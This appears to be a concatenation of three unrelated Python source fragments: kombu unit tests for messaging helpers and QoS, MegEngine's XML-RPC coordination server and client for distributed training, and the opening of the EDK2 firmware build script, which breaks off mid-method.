def test_with_retry(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
assert entity.is_bound, "Expected entity is bound to begin this test."
# When calling maybe_declare with retry enabled (default policy)
maybe_declare(entity, channel, retry=True)
# Then: the connection client used ensure to ensure the retry policy
assert channel.connection.client.ensure.call_count
def test_with_retry_dropped_connection(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
assert entity.is_bound, "Expected entity is bound to begin this test."
# When: Entity channel connection has gone away
entity.channel.connection = None
# When: calling maybe_declare with retry
# Then: the RecoverableConnectionError should be raised
with pytest.raises(RecoverableConnectionError):
maybe_declare(entity, channel, retry=True)
class test_replies:
def test_send_reply(self):
req = Mock()
req.content_type = 'application/json'
req.content_encoding = 'binary'
req.properties = {'reply_to': 'hello',
'correlation_id': 'world'}
channel = Mock()
exchange = Mock()
exchange.is_bound = True
exchange.channel = channel
producer = Mock()
producer.channel = channel
producer.channel.connection.client.declared_entities = set()
send_reply(exchange, req, {'hello': 'world'}, producer)
assert producer.publish.call_count
args = producer.publish.call_args
assert args[0][0] == {'hello': 'world'}
assert args[1] == {
'exchange': exchange,
'routing_key': 'hello',
'correlation_id': 'world',
'serializer': 'json',
'retry': False,
'retry_policy': None,
'content_encoding': 'binary',
}
@patch('kombu.common.itermessages')
def test_collect_replies_with_ack(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
body, message = Mock(), Mock()
itermessages.return_value = [(body, message)]
it = collect_replies(conn, channel, queue, no_ack=False)
m = next(it)
assert m is body
itermessages.assert_called_with(conn, channel, queue, no_ack=False)
message.ack.assert_called_with()
with pytest.raises(StopIteration):
next(it)
channel.after_reply_message_received.assert_called_with(queue.name)
@patch('kombu.common.itermessages')
def test_collect_replies_no_ack(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
body, message = Mock(), Mock()
itermessages.return_value = [(body, message)]
it = collect_replies(conn, channel, queue)
m = next(it)
assert m is body
itermessages.assert_called_with(conn, channel, queue, no_ack=True)
message.ack.assert_not_called()
@patch('kombu.common.itermessages')
def test_collect_replies_no_replies(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
itermessages.return_value = []
it = collect_replies(conn, channel, queue)
with pytest.raises(StopIteration):
next(it)
channel.after_reply_message_received.assert_not_called()
class test_insured:
@patch('kombu.common.logger')
def test_ensure_errback(self, logger):
common._ensure_errback('foo', 30)
logger.error.assert_called()
def test_revive_connection(self):
on_revive = Mock()
channel = Mock()
common.revive_connection(Mock(), channel, on_revive)
on_revive.assert_called_with(channel)
common.revive_connection(Mock(), channel, None)
def get_insured_mocks(self, insured_returns=('works', 'ignored')):
conn = ContextMock()
pool = MockPool(conn)
fun = Mock()
insured = conn.autoretry.return_value = Mock()
insured.return_value = insured_returns
return conn, pool, fun, insured
def test_insured(self):
conn, pool, fun, insured = self.get_insured_mocks()
ret = common.insured(pool, fun, (2, 2), {'foo': 'bar'})
assert ret == 'works'
conn.ensure_connection.assert_called_with(
errback=common._ensure_errback,
)
insured.assert_called()
i_args, i_kwargs = insured.call_args
assert i_args == (2, 2)
assert i_kwargs == {'foo': 'bar', 'connection': conn}
conn.autoretry.assert_called()
ar_args, ar_kwargs = conn.autoretry.call_args
assert ar_args == (fun, conn.default_channel)
assert ar_kwargs.get('on_revive')
assert ar_kwargs.get('errback')
def test_insured_custom_errback(self):
conn, pool, fun, insured = self.get_insured_mocks()
custom_errback = Mock()
common.insured(pool, fun, (2, 2), {'foo': 'bar'},
errback=custom_errback)
conn.ensure_connection.assert_called_with(errback=custom_errback)
class MockConsumer:
consumers = set()
def __init__(self, channel, queues=None, callbacks=None, **kwargs):
self.channel = channel
self.queues = queues
self.callbacks = callbacks
def __enter__(self):
self.consumers.add(self)
return self
def __exit__(
self,
exc_type: type[BaseException] | None,
exc_val: BaseException | None,
exc_tb: TracebackType | None
) -> None:
self.consumers.discard(self)
class test_itermessages:
class MockConnection:
should_raise_timeout = False
def drain_events(self, **kwargs):
if self.should_raise_timeout:
raise socket.timeout()
for consumer in MockConsumer.consumers:
for callback in consumer.callbacks:
callback('body', 'message')
def test_default(self):
conn = self.MockConnection()
channel = Mock()
channel.connection.client = conn
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
ret = next(it)
assert ret == ('body', 'message')
with pytest.raises(StopIteration):
next(it)
def test_when_raises_socket_timeout(self):
conn = self.MockConnection()
conn.should_raise_timeout = True
channel = Mock()
channel.connection.client = conn
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
with pytest.raises(StopIteration):
next(it)
@patch('kombu.common.deque')
def test_when_raises_IndexError(self, deque):
deque_instance = deque.return_value = Mock()
deque_instance.popleft.side_effect = IndexError()
conn = self.MockConnection()
channel = Mock()
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
with pytest.raises(StopIteration):
next(it)
class test_QoS:
class _QoS(QoS):
def __init__(self, value):
self.value = value
super().__init__(None, value)
def set(self, value):
return value
def test_qos_exceeds_16bit(self):
with patch('kombu.common.logger') as logger:
callback = Mock()
qos = QoS(callback, 10)
qos.prev = 100
# cannot use 2 ** 32 because of a bug on macOS Py2.5:
# https://jira.mongodb.org/browse/PYTHON-389
qos.set(4294967296)
logger.warning.assert_called()
callback.assert_called_with(prefetch_count=0)
def test_qos_increment_decrement(self):
qos = self._QoS(10)
assert qos.increment_eventually() == 11
assert qos.increment_eventually(3) == 14
assert qos.increment_eventually(-30) == 14
assert qos.decrement_eventually(7) == 7
assert qos.decrement_eventually() == 6
def test_qos_disabled_increment_decrement(self):
qos = self._QoS(0)
assert qos.increment_eventually() == 0
assert qos.increment_eventually(3) == 0
assert qos.increment_eventually(-30) == 0
assert qos.decrement_eventually(7) == 0
assert qos.decrement_eventually() == 0
assert qos.decrement_eventually(10) == 0
def test_qos_thread_safe(self):
qos = self._QoS(10)
def add():
for i in range(1000):
qos.increment_eventually()
def sub():
for i in range(1000):
qos.decrement_eventually()
def threaded(funs):
from threading import Thread
threads = [Thread(target=fun) for fun in funs]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
threaded([add, add])
assert qos.value == 2010
qos.value = 1000
threaded([add, sub]) # n = 2
assert qos.value == 1000
def test_exceeds_short(self):
qos = QoS(Mock(), PREFETCH_COUNT_MAX - 1)
qos.update()
assert qos.value == PREFETCH_COUNT_MAX - 1
qos.increment_eventually()
assert qos.value == PREFETCH_COUNT_MAX
qos.increment_eventually()
assert qos.value == PREFETCH_COUNT_MAX + 1
qos.decrement_eventually()
assert qos.value == PREFETCH_COUNT_MAX
qos.decrement_eventually()
assert qos.value == PREFETCH_COUNT_MAX - 1
def test_consumer_increment_decrement(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.update()
assert qos.value == 10
mconsumer.qos.assert_called_with(prefetch_count=10)
qos.decrement_eventually()
qos.update()
assert qos.value == 9
mconsumer.qos.assert_called_with(prefetch_count=9)
qos.decrement_eventually()
assert qos.value == 8
mconsumer.qos.assert_called_with(prefetch_count=9)
assert {'prefetch_count': 9} in mconsumer.qos.call_args
# Does not decrement 0 value
qos.value = 0
qos.decrement_eventually()
assert qos.value == 0
qos.increment_eventually()
assert qos.value == 0
def test_consumer_decrement_eventually(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.decrement_eventually()
assert qos.value == 9
qos.value = 0
qos.decrement_eventually()
assert qos.value == 0
def test_set(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.set(12)
assert qos.prev == 12
qos.set(qos.prev)
|
server.py
|
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import threading
import time
from collections import defaultdict
from functools import partial
from socketserver import ThreadingMixIn
from xmlrpc.client import ServerProxy
from xmlrpc.server import SimpleXMLRPCServer
from ..core._imperative_rt.utils import create_mm_server
from ..utils.future import Future
class Methods:
"""
Distributed Server Method.
Used for exchange information between distributed nodes.
:param mm_server_port: multiple machine rpc server port.
"""
def __init__(self, mm_server_port):
self.lock = threading.Lock()
self.mm_server_port = mm_server_port
self.dict_is_grad = defaultdict(partial(Future, True))
self.dict_remote_tracer = defaultdict(partial(Future, True))
self.dict_pack_list = defaultdict(partial(Future, False))
self.dict_barrier_counter = defaultdict(int)
self.dict_barrier_event = defaultdict(threading.Event)
self.user_dict = defaultdict(partial(Future, False))
self.bcast_dict = {}
def connect(self):
"""Method for checking connection success."""
return True
def get_mm_server_port(self):
"""Get multiple machine rpc server port."""
return self.mm_server_port
def set_is_grad(self, key, is_grad):
"""
Mark send/recv need gradiants by key.
:param key: key to match send/recv op.
:param is_grad: whether this op need grad.
"""
with self.lock:
future = self.dict_is_grad[key]
future.set(is_grad)
return True
def check_is_grad(self, key):
"""
Check whether send/recv need gradiants.
:param key: key to match send/recv op.
"""
with self.lock:
future = self.dict_is_grad[key]
ret = future.get()
with self.lock:
del self.dict_is_grad[key]
return ret
def set_remote_tracer(self, key, tracer_set):
"""
Set tracer dict for tracing send/recv op.
:param key: key to match send/recv op.
:param tracer_set: valid tracer set.
"""
with self.lock:
future = self.dict_remote_tracer[key]
future.set(tracer_set)
return True
def check_remote_tracer(self, key):
"""
Get tracer dict for send/recv op.
:param key: key to match send/recv op.
"""
with self.lock:
future = self.dict_remote_tracer[key]
ret = future.get()
with self.lock:
del self.dict_remote_tracer[key]
return ret
def group_barrier(self, key, size):
"""
A barrier wait for all group member.
:param key: group key to match each other.
:param size: group size.
"""
with self.lock:
self.dict_barrier_counter[key] += 1
counter = self.dict_barrier_counter[key]
event = self.dict_barrier_event[key]
if counter == size:
del self.dict_barrier_counter[key]
del self.dict_barrier_event[key]
event.set()
else:
event.wait()
return True
def user_set(self, key, val):
"""Set user defined key-value pairs across processes."""
with self.lock:
future = self.user_dict[key]
future.set(val)
return True
def user_get(self, key):
"""Get user defined key-value pairs across processes."""
with self.lock:
future = self.user_dict[key]
return future.get()
def bcast_val(self, val, key, size):
with self.lock:
if key not in self.bcast_dict:
self.bcast_dict[key] = [Future(False), size]
arr = self.bcast_dict[key]
if val is not None:
arr[0].set(val)
val = None
else:
val = arr[0].get()
with self.lock:
cnt = arr[1] - 1
arr[1] = cnt
if cnt == 0:
del self.bcast_dict[key]
return val
def _del(self, key):
with self.lock:
del self.user_dict[key]
# thread safe function
def user_pop(self, key):
ret = self.user_get(key)
self._del(key)
return ret
class ThreadXMLRPCServer(ThreadingMixIn, SimpleXMLRPCServer):
pass
def _start_server(py_server_port, queue):
"""
Start python distributed server and multiple machine server.
:param py_server_port: python server port.
:param mm_server_port: multiple machine server port.
:param queue: server port will put in this queue, puts exception when process fails.
"""
try:
mm_server_port = create_mm_server("0.0.0.0", 0)
server = ThreadXMLRPCServer(
("0.0.0.0", py_server_port), logRequests=False, allow_none=True
)
server.register_instance(Methods(mm_server_port))
_, py_server_port = server.server_address
queue.put((py_server_port, mm_server_port))
server.serve_forever()
except Exception as e:
queue.put(e)
class Server:
"""
Distributed Server for distributed training.
Should be running at master node.
:param port: python server port.
"""
def __init__(self, port=0):
q = mp.Queue()
self.proc = mp.Process(target=_start_server, args=(port, q), daemon=True)
self.proc.start()
ret = q.get()
if isinstance(ret, Exception):
raise ret
else:
self.py_server_port, self.mm_server_port = ret
def __del__(self):
self.proc.terminate()
class Client:
"""
Distributed Client for distributed training.
:param master_ip: ip address of master node.
:param port: port of server at master node.
"""
def __init__(self, master_ip, port):
self.master_ip = master_ip
self.port = port
self.connect()
self.bcast_dict = defaultdict(lambda: 0)
def connect(self):
"""Check connection success."""
while True:
try:
self.proxy = ServerProxy(
"http://{}:{}".format(self.master_ip, self.port), allow_none=True
)
if self.proxy.connect():
break
except:
time.sleep(1)
def get_mm_server_port(self):
"""Get multiple machine server port."""
return self.proxy.get_mm_server_port()
def set_is_grad(self, key, is_grad):
"""
Mark send/recv need gradiants by key.
:param key: key to match send/recv op.
:param is_grad: whether this op need grad.
"""
self.proxy.set_is_grad(key, is_grad)
def check_is_grad(self, key):
"""
Check whether send/recv need gradiants.
:param key: key to match send/recv op.
"""
return self.proxy.check_is_grad(key)
def set_remote_tracer(self, key, tracer_set):
"""
Set tracer dict for tracing send/recv op.
:param key: key to match send/recv op.
:param tracer_set: valid tracer set.
"""
self.proxy.set_remote_tracer(key, tracer_set)
def check_remote_tracer(self, key):
"""
Get tracer dict for send/recv op.
:param key: key to match send/recv op.
"""
return self.proxy.check_remote_tracer(key)
def group_barrier(self, key, size):
"""
A barrier wait for all group member.
:param key: group key to match each other.
:param size: group size.
"""
self.proxy.group_barrier(key, size)
def user_set(self, key, val):
"""Set user defined key-value pairs across processes."""
return self.proxy.user_set(key, val)
def user_get(self, key):
"""Get user defined key-value pairs across processes."""
return self.proxy.user_get(key)
def user_pop(self, key):
"""Get user defined key-value pairs and delete the resources when the get is done"""
return self.proxy.user_pop(key)
def bcast_val(self, val, key, size):
idx = self.bcast_dict[key] + 1
self.bcast_dict[key] = idx
key = key + "_bcast_" + str(idx)
return self.proxy.bcast_val(val, key, size)
def main(port=0, verbose=True):
mm_server_port = create_mm_server("0.0.0.0", 0)
server = ThreadXMLRPCServer(("0.0.0.0", port), logRequests=verbose)
server.register_instance(Methods(mm_server_port))
_, port = server.server_address
print("serving on port", port)
server.serve_forever()
if __name__ == "__main__":
import argparse
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--port", type=int, default=0)
ap.add_argument("-v", "--verbose", type=bool, default=True)
args = ap.parse_args()
main(port=args.port, verbose=args.verbose)
|
build.py
|
## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2019, Intel Corporation. All rights reserved.<BR>
# Copyright (c) 2018, Hewlett Packard Enterprise Development, L.P.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
from __future__ import print_function
import Common.LongFilePathOs as os
import re
import sys
import glob
import time
import platform
import traceback
import encodings.ascii
import multiprocessing
from struct import *
from threading import *
import threading
from optparse import OptionParser
from subprocess import *
from Common import Misc as Utils
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.TargetTxtClassObject import TargetTxtClassObject
from Common.ToolDefClassObject import ToolDefClassObject
from Common.DataType import *
from Common.BuildVersion import gBUILD_VERSION
from AutoGen.AutoGen import *
from Common.BuildToolError import *
from Workspace.WorkspaceDatabase import WorkspaceDatabase
from Common.MultipleWorkspace import MultipleWorkspace as mws
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import *
from PatchPcdValue.PatchPcdValue import *
import Common.EdkLogger
import Common.GlobalData as GlobalData
from GenFds.GenFds import GenFds, GenFdsApi
from collections import OrderedDict, defaultdict
# Version and Copyright
VersionNumber = "0.60" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + VersionNumber
__copyright__ = "Copyright (c) 2007 - 2018, Intel Corporation All rights reserved."
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
if 'PATHEXT' in os.environ:
extns = os.environ['PATHEXT'].split(os.path.pathsep)
else:
extns = ('',)
for pathDir in os.environ['PATH'].split(os.path.pathsep):
for ext in extns:
if os.path.exists(os.path.join(pathDir, tool + ext)):
return True
return False
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory contains all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of above environment variable is not set or has error, the build
# will be broken.
#
def CheckEnvVariable():
# check WORKSPACE
if "WORKSPACE" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
if not os.path.exists(WorkspaceDir):
EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData=WorkspaceDir)
elif ' ' in WorkspaceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
ExtraData=WorkspaceDir)
os.environ["WORKSPACE"] = WorkspaceDir
# set multiple workspace
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(WorkspaceDir, PackagesPath)
if mws.PACKAGES_PATH:
for Path in mws.PACKAGES_PATH:
if not os.path.exists(Path):
EdkLogger.error("build", FILE_NOT_FOUND, "One Path in PACKAGES_PATH doesn't exist", ExtraData=Path)
elif ' ' in Path:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in PACKAGES_PATH", ExtraData=Path)
os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
# check EDK_TOOLS_PATH
if "EDK_TOOLS_PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="EDK_TOOLS_PATH")
# check PATH
if "PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="PATH")
GlobalData.gWorkspace = WorkspaceDir
GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to be local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
# check if the path is absolute or relative
if os.path.isabs(FilePath):
FileFullPath = os.path.normpath(FilePath)
else:
FileFullPath = os.path.normpath(mws.join(Workspace, FilePath))
Workspace = mws.getWs(Workspace, FilePath)
# check if the file path exists or not
if not os.path.isfile(FileFullPath):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
# remove workspace directory from the beginning part of the file path
if Workspace[-1] in ["\\", "/"]:
return FileFullPath[len(Workspace):]
else:
return FileFullPath[(len(Workspace) + 1):]
## Get the output of an external program
#
# This is the entrance method of thread reading output of an external program and
# putting them in STDOUT/STDERR of current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != b"":
To(Line.rstrip().decode(encoding='utf-8', errors='ignore'))
else:
break
if ExitFlag.isSet():
break
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir):
BeginTime = time.time()
# if working directory doesn't exist, Popen() will raise an exception
if not os.path.isdir(WorkingDir):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
# Command is used as the first Argument in following Popen().
# It could be a string or sequence. We find that if command is a string in following Popen(),
# ubuntu may fail with an error message that the command is not found.
# So here we may need convert command from string to list instance.
if platform.system() != 'Windows':
if not isinstance(Command, list):
Command = Command.split()
Command = ' '.join(Command)
Proc = None
EndOfProcedure = None
try:
# launch the command
Proc = Popen(Command, stdout=PIPE, stderr=PIPE, env=os.environ, cwd=WorkingDir, bufsize=-1, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Proc.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Proc.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Proc.wait()
except: # in case of aborting
# terminate the threads redirecting the program output
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
if EndOfProcedure is not None:
EndOfProcedure.set()
if Proc is None:
if not isinstance(Command, type("")):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
if Proc.stdout:
StdOutThread.join()
if Proc.stderr:
StdErrThread.join()
# check the return code of the program
if Proc.returncode != 0:
if not isinstance(Command, type("")):
Command = " ".join(Command)
# print out the Response file and its content when make failure
RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
if os.path.isfile(RespFile):
f = open(RespFile)
RespContent = f.read()
f.close()
EdkLogger.info(RespContent)
EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
return "%dms" % (int(round((time.time() - BeginTime) * 1000)))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise there could be build units
# missing build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
## The constructor
#
# @param self The object pointer
# @param Obj The object the build is working on
# @param Target The build target name, one of gSupportedTarget
# @param Dependency The BuildUnit(s) which must be completed in advance
# @param WorkingDir The directory build command starts in
#
def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
self.BuildObject = Obj
self.Dependency = Dependency
self.WorkingDir = WorkingDir
self.Target = Target
self.BuildCommand = BuildCommand
if not BuildCommand:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
ExtraData=str(Obj))
## str() method
#
# It just returns the string representation of self.BuildObject
#
# @param self The object pointer
#
def __str__(self):
return str(self.BuildObject)
## "==" operator method
#
# It just compares self.BuildObject with "Other". So self.BuildObject must
# provide its own __eq__() method.
#
# @param self The object pointer
# @param Other The other BuildUnit object compared to
#
def __eq__(self, Other):
return Other and self.BuildObject == Other.BuildObject \
and Other.BuildObject \
and self.BuildObject.Arch == Other.BuildObject.Arch
## hash() method
#
# It just returns the hash value of self.BuildObject which must be hashable.
#
# @param self The object pointer
#
def __hash__(self):
return hash(self.BuildObject) + hash(self.BuildObject.Arch)
def __repr__(self):
return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The ModuleAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(La, Target) for La in Obj.LibraryAutoGenList]
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
if Target in [None, "", "all"]:
self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise there could
# be make units missing build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The PlatformAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(Lib, Target) for Lib in self.BuildObject.LibraryAutoGenList]
Dependency.extend([ModuleMakeUnit(Mod, Target) for Mod in self.BuildObject.ModuleAutoGenList])
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling thread running, catching thread error, monitor the thread status, etc.
#
class BuildTask:
# queue for tasks waiting for schedule
_PendingQueue = OrderedDict()
_PendingQueueLock = threading.Lock()
# queue for tasks ready for running
_ReadyQueue = OrderedDict()
_ReadyQueueLock = threading.Lock()
# queue for run tasks
_RunningQueue = OrderedDict()
_RunningQueueLock = threading.Lock()
# queue containing all build tasks, in case duplicate build
_TaskQueue = OrderedDict()
# flag indicating error occurs in a running thread
_ErrorFlag = threading.Event()
_ErrorFlag.clear()
_ErrorMessage = ""
# BoundedSemaphore object used to control the number of running threads
_Thread = None
# flag indicating if the scheduler is started or not
_SchedulerStopped = threading.Event()
_SchedulerStopped.set()
## Start the task scheduler thread
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def StartScheduler(MaxThreadNumber, ExitFlag):
SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
SchedulerThread.setName("Build-Task-Scheduler")
SchedulerThread.setDaemon(False)
SchedulerThread.start()
# wait for the scheduler to be started, especially useful in Linux
while not BuildTask.IsOnGoing():
time.sleep(0.01)
## Scheduler method
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def Scheduler(MaxThreadNumber, ExitFlag):
BuildTask._SchedulerStopped.clear()
try:
# use BoundedSemaphore to control the maximum running threads
BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
#
# scheduling loop, which will exits when no pending/ready task and
# indicated to do so, or there's error in running thread
#
while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
or not ExitFlag.isSet()) and not BuildTask._ErrorFlag.isSet():
EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
% (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
# get all pending tasks
BuildTask._PendingQueueLock.acquire()
BuildObjectList = list(BuildTask._PendingQueue.keys())
#
# check if their dependency is resolved, and if true, move them
# into ready queue
#
for BuildObject in BuildObjectList:
Bt = BuildTask._PendingQueue[BuildObject]
if Bt.IsReady():
BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
BuildTask._PendingQueueLock.release()
# launch build thread until the maximum number of threads is reached
while not BuildTask._ErrorFlag.isSet():
# empty ready queue, do nothing further
if len(BuildTask._ReadyQueue) == 0:
break
# wait for active thread(s) exit
BuildTask._Thread.acquire(True)
# start a new build thread
Bo, Bt = BuildTask._ReadyQueue.popitem()
# move into running queue
BuildTask._RunningQueueLock.acquire()
BuildTask._RunningQueue[Bo] = Bt
BuildTask._RunningQueueLock.release()
Bt.Start()
# avoid tense loop
time.sleep(0.01)
# avoid tense loop
time.sleep(0.01)
# wait for all running threads exit
if BuildTask._ErrorFlag.isSet():
EdkLogger.quiet("\nWaiting for all build threads exit...")
# while not BuildTask._ErrorFlag.isSet() and \
while len(BuildTask._RunningQueue) > 0:
EdkLogger.verbose("Waiting for thread ending...(%d)" % len(BuildTask._RunningQueue))
EdkLogger.debug(EdkLogger.DEBUG_8, "Threads [%s]" % ", ".join(Th.getName() for Th in threading.enumerate()))
# avoid tense loop
time.sleep(0.1)
except BaseException as X:
#
# TRICK: hide the output of threads left running, so that the user can
# catch the error message easily
#
EdkLogger.SetLevel(EdkLogger.ERROR)
BuildTask._ErrorFlag.set()
BuildTask._ErrorMessage = "build thread scheduler error\n\t%s" % str(X)
BuildTask._PendingQueue.clear()
BuildTask._ReadyQueue.clear()
BuildTask._RunningQueue.clear()
BuildTask._TaskQueue.clear()
BuildTask._SchedulerStopped.set()
## Wait for all running method exit
#
@staticmethod
def WaitForComplete():
BuildTask._SchedulerStopped.wait()
## Check if the scheduler is running or not
#
@staticmethod
def IsOnGoing():
return not BuildTask._SchedulerStopped.isSet()
## Abort the build
@staticmethod
def Abort():
if BuildTask.IsOnGoing():
BuildTask._ErrorFlag.set()
BuildTask.WaitForComplete()
## Check if there's error in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use threading.Event to communicate this formation to main thread.
#
@staticmethod
def HasError():
return BuildTask._ErrorFlag.isSet()
## Get error message in running thread
#
# Since the main thread cannot catch exceptions in other thread, we have to
# use a static variable to communicate this message to main thread.
#
@staticmethod
def GetErrorMessage():
return BuildTask._ErrorMessage
## Factory method to create a BuildTask object
#
# This method will check if a module is building or has been built. And if
# true, just return the associated BuildTask object in the _TaskQueue. If
# not, create and return a new BuildTask object. The new BuildTask object
# will be appended to the _PendingQueue for scheduling later.
#
# @param BuildItem A BuildUnit object representing a build object
# @param Dependency The dependent build object of BuildItem
#
@staticmethod
def New(BuildItem, Dependency=None):
if BuildItem in BuildTask._TaskQueue:
Bt = BuildTask._TaskQueue[BuildItem]
return Bt
Bt = BuildTask()
Bt._Init(BuildItem, Dependency)
